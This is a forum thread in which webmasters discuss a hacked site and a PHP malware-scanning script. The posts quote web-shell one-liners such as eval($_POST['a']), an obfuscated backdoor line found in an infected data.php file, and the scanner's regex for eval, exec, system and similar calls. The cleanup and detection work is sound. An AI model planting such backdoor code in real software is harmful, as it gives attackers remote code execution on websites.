Website hacked

rogerthn
Posts: 489
Joined: Thu 11 Apr 2013 6:31 pm
Weather Station: Ecowitt GW1000/GW1003
Operating System: Raspberry Pi OS bullseye aarch64
Location: Trollhättan Sweden

Re: Website hacked

Post by rogerthn »

saratogaWX wrote: Fri 30 Apr 2021 9:30 pm
I've sent a PM with a link to a tool I developed to spot malware on PHP sites.

Best regards,
Ken

p.s. I've used this to help disinfect about 10 sites for folks so far.
May I please also have that link?
saratogaWX
Posts: 1170
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA

Re: Website hacked

Post by saratogaWX »

Sure. PM sent.
water01
Posts: 3215
Joined: Sat 13 Aug 2011 9:33 am
Weather Station: Ecowitt HP2551
Operating System: Windows 10 64bit
Location: Burnham-on-Sea

Re: Website hacked

Post by water01 »

Could I also have it? Or perhaps we can make it part of the Wiki?
David
saratogaWX
Posts: 1170
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA

Re: Website hacked

Post by saratogaWX »

Sure, I guess it's not really a secret.

https://saratoga-weather.org/chk-files.php?sce=view

Place in the document root of your website. It will scan all .php and .htaccess files looking for possibly malicious content.

It will flag (based on a regex) things that look like constructed functions $functionname(), exec(), system(), eval(), base64_decode(), $_POST usage. It can flag harmless instances too, so it's important to sanity check the output; there can be a lot of false positives.
rogerthn
Posts: 489
Joined: Thu 11 Apr 2013 6:31 pm
Weather Station: Ecowitt GW1000/GW1003
Operating System: Raspberry Pi OS bullseye aarch64
Location: Trollhättan Sweden

Re: Website hacked

Post by rogerthn »

Thanks!
Is this what to look for?

5 instances of ....
saratogaWX
Posts: 1170
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA

Re: Website hacked

Post by saratogaWX »

That just shows the count of 'hits' that the regex found that deserve looking at.

Each 'hit' is shown above with the matching part in red. You have to examine it and determine if it's possibly malicious.

Things that look like
eval($_POST['a']) or
eval(base64_decode($_POST['a']))
are obviously bad.
As is something like
./data.php Created=20-Dec-2020 14:47:46 GMT Modified=20-Dec-2020 14:47:46 GMT size=184 bytes.
3 (count($b) == 8)?(($ij = $b[58].$b[88]) && ($qc = $ij($b[23].$b[42])) && ($_qc = $ij($b[65].$b[27])) && ($_qc = $qc($b[95], $_qc($ij($b[22])))) && @$_qc()) : $b;
(the $variable() functions are a give away that something untoward is happening)

Sometimes, a flagged entry happens inside a comment (// or # or /*...*/) so looks bad, but is not really executed, and so not harmful.

That's why the results found by the script have to be sanity checked, as the filter is cast quite wide.
PaulMy
Posts: 3775
Joined: Sun 28 Sep 2008 11:54 pm
Weather Station: Davis VP2 Plus 24-Hour FARS
Operating System: Windows8 and Windows10
Location: Komoka, ON Canada

Re: Website hacked

Post by PaulMy »

Hi Ken,
I have run the script but not sure what to make of the results:

Match pattern used is '/(.x3D|chr\(61\)|eval\s*\(|@eval\s*\(|\s+base64_decode\s*\(|addtype|addhandler|RewriteRule|RewriteCond|\s+exec\s*\(|@exec\s*\(|\s+system\s*\(|@system\s*\(|\s+passthru\s*\(|@passthru\s*\(|\s+[@]{0,1]assert\s*\(|\s+assert_options\s*\(|\$_POST\[|=\s*\$[a-z0-9A-Z\_]+\s*\()/i'

   ./saratoga-malwarescanner3.php Created=02-May-2021 19:25:14 GMT Modified=02-May-2021 19:25:14 GMT size=7426 bytes.
28	  $toFind = '.x3D|chr\(61\)|eval\s*\(|@eval\s*\(|\s+base64_decode\s*\(|addtype|addhandler|RewriteRule|RewriteCond|\s+exec\s*\(|@exec\s*\(|\s+system\s*\(|@system\s*\(|\s+passthru\s*\(|@passthru\s*\(|\s+[@]{0,1]assert\s*\(|\s+assert_options\s*\(|\$_POST\[|=\s*\$[a-z0-9A-Z\_]+\s*\(';
   ./jpgraph/jpgraph_utils.inc.php Created=22-Mar-2021 02:35:45 GMT Modified=22-Mar-2021 02:35:45 GMT size=25399 bytes.
37	  @eval($t);
   ./jpgraph/jpgraph_legend.inc.php Created=22-Mar-2021 02:35:43 GMT Modified=22-Mar-2021 02:35:43 GMT size=18105 bytes.
212	  //echo "h=$h ({$this->mark_abs_vsize},{$this->ymargin})<br />";
7 instances of '.x3D|chr\(61\)|eval\s*\(|@eval\s*\(|\s+base64_decode\s*\(|addtype|addhandler|RewriteRule|RewriteCond|\s+exec\s*\(|@exec\s*\(|\s+system\s*\(|@system\s*\(|\s+passthru\s*\(|@passthru\s*\(|\s+[@]{0,1]assert\s*\(|\s+assert_options\s*\(|\$_POST\[|=\s*\$[a-z0-9A-Z\_]+\s*\(' found in 3 '.php;.htaccess;' files using 2.985 secs.
I have compared the two files in DiffMerge and the website files are identical to the files in the template download unzipped files, so appears no changes made to the files while on the webserver.

Should I be concerned or need to take any action?

Thanks,
Paul
Davis Vantage Pro2+
C1 www.komokaweather.com/komokaweather-ca
MX www.komokaweather.com/cumulusmx/index.htm /index.html /index.php
MX www.komokaweather.com/cumulusmxwll/index.htm /index.html /index.php
MX www.komokaweather.com/cumulusmx4/index.htm

saratogaWX
Posts: 1170
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA

Re: Website hacked

Post by saratogaWX »

So, of the ones displayed, only

   ./jpgraph/jpgraph_utils.inc.php Created=22-Mar-2021 02:35:45 GMT Modified=22-Mar-2021 02:35:45 GMT size=25399 bytes.
37	  @eval($t);
caught my eye. You should take a look in jpgraph_utils.inc.php for how $t is set by the code. If it comes from an argument ($_GET/$_POST/$_REQUEST) directly without 'sanitation', then it's a big problem. If $t is constructed without using any of the above, it's likely benign.